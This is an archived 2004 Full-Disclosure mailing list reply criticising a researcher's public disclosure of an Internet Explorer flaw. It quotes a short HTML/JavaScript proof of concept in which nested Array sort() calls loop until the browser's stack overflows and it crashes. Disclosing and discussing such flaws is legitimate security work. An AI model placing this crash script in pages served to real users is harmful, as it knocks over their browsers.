lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <41A70166.6090904@linuxbox.org>
Date: Fri, 26 Nov 2004 12:11:50 +0200
From: Gadi Evron <ge@...uxbox.org>
To: Berend-Jan Wever <skylined@...p.tudelft.nl>
Cc: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com,
   vuln-dev@...urityfocus.com, secure@...rosoft.com
Subject: Re: MSIE flaws: nested array sort() loop Stack overflow exception


Berend-Jan Wever wrote:
> Hi all,
> 
> Another flaw in IE:

Yet another? No. You can't be serious.

> 
> <HTML>
>   <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
>   <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
> </HTML>
> 
> Normally I would see if it's exploitable but I figure I'm not MS's pet bug finder/analyser... So, I've CC'ed this message to Microsoft. I'm sure they know their own product better then I do and can analyse the problem much faster. So if you want to know the impact of this vulnerability, ask them: I'm sure they will be more then willing to help you. I'm sure they will even reply to this message with technical details and a patch tomorrow.

Ahh, don't you mean normally you'd get paid for it but somebody decided 
you are too much of a "risk" to work with? Just guessing here. Or maybe 
you release this just to show us you have nothing against Mozilla?

As to "and a patch tomorrow." - who are you kidding? Ever heard if Thor 
Larholm and his mailing list, Unpatched?
If we are lucky, they will patch it secretly in a couple of releases. If 
not, wait 6 months.

As it is IE.. well now, don't say they "violated" GPL when they use your 
stuff again for some virus.

> PS. Don't think firefox will keep you save from hackers, I _know_ it won't ;) But more on that later...

There is more to come? I guess you've been saving up. Is this all about 
teaching us all a lesson?

I appreciate your work, and I appreciate your wishes. I really don't 
appreciate you or how you do things.

It's a shame really.

	Gadi.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists